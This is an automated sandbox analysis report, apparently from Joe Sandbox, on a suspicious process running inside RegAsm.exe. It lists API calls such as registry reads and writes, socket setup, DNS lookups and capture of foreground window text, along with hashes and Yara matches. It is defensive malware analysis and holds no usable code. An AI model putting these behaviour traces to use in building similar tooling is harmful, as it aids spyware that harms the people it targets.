                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • RegQueryValueExA.KERNEL32 ref: 00413622
                            • RegCloseKey.KERNEL32(?), ref: 0041362D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                            • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                            • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                            • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • RegQueryValueExA.KERNEL32 ref: 00413768
                            • RegCloseKey.KERNEL32(00000000), ref: 00413773
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                            • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                            • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                            • RegQueryValueExA.KERNEL32 ref: 004135C2
                            • RegCloseKey.KERNEL32(?), ref: 004135CD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                            • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                            APIs
                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                            • RegQueryValueExA.KERNEL32 ref: 00413565
                            • RegCloseKey.KERNEL32(?), ref: 00413570
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                            • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                            • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                            APIs
                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-3916222277
                            • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                            • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                            • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                            • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                            APIs
                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info
                            • String ID:
                            • API String ID: 1807457897-3916222277
                            • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                            • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                            • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                            • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen
                            • String ID: ;S
                            • API String ID: 176396367-719420394
                            • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                            • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                            • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                            • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                            APIs
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: String
                            • String ID: LCMapStringEx
                            • API String ID: 2568140703-3893581201
                            • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                            • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                            • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                            • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                            APIs
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: String
                            • String ID: LCMapStringEx
                            • API String ID: 2568140703-3893581201
                            • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                            • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                            • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                            • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                            APIs
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                            Strings
                            • InitializeCriticalSectionEx, xrefs: 00448B1F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpin
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 2593887523-3084827643
                            • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                            • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                            • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                            • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Alloc
                            • String ID: FlsAlloc
                            • API String ID: 2773662609-671089009
                            • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                            • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                            • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                            • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Alloc
                            • String ID: FlsAlloc
                            • API String ID: 2773662609-671089009
                            • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                            • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                            • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                            • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                            APIs
                            • try_get_function.LIBVCRUNTIME ref: 10003B06
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: try_get_function
                            • String ID: FlsAlloc
                            • API String ID: 2742660187-671089009
                            • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                            • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                            • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                            • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                            APIs
                            • try_get_function.LIBVCRUNTIME ref: 00438E29
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: try_get_function
                            • String ID: FlsAlloc
                            • API String ID: 2742660187-671089009
                            • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                            • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                            • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                            • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: @
                            • API String ID: 1890195054-2766056989
                            • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                            • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                            APIs
                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                            • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: CodeInfoPageValid
                            • String ID:
                            • API String ID: 546120528-0
                            • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                            • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                            • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                            • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                            APIs
                              • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                            • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CodeInfoPageValid
                            • String ID:
                            • API String ID: 546120528-0
                            • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                            • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                            • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                            • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                              • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                              • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                            • _free.LIBCMT ref: 0044F050
                            • _free.LIBCMT ref: 0044F086
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast_abort
                            • String ID:
                            • API String ID: 2991157371-0
                            • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                            • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                            • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                            • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                            APIs
                            • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                            • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                            • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                            • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                            APIs
                            • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                              • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                            • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                            • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                            • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                            APIs
                            • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                            • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                            • String ID:
                            • API String ID: 3750050125-0
                            • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                            • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                            • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                            • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                            • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                            • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                            • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$ForegroundText
                            • String ID:
                            • API String ID: 29597999-0
                            • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                            • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                            • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                            • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                            APIs
                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                            • WSASetLastError.WS2_32(00000000), ref: 00414F4B
